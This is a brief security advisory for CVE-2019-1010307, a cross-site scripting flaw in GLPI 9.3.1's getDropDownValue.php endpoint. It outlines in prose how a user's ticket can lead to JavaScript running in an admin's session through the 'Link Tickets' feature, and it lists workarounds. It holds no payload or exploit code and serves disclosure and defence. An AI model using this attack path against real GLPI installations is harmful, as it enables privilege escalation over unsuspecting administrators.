CVE-2019-1010307

Name of the Vulnerable Software and Affected Versions: GLPI version 9.3.1

Description: The issue affects the /glpi/ajax/getDropDownValue.php endpoint, allowing for Cross Site Scripting (XSS) attacks. This can lead to privilege escalation and the execution of JavaScript code on the admin interface. The attack involves a user creating a ticket, an admin opening another ticket and using the "Link Tickets" feature, which triggers a request to the vulnerable endpoint, fetching and executing JavaScript code.

Recommendations: For GLPI version 9.3.1, as a temporary workaround, consider disabling the "Link Tickets" feature until a patch is available. Restrict access to the /glpi/ajax/getDropDownValue.php endpoint to minimize the risk of exploitation. Avoid using the "Link Tickets" feature in the affected version until the issue is resolved.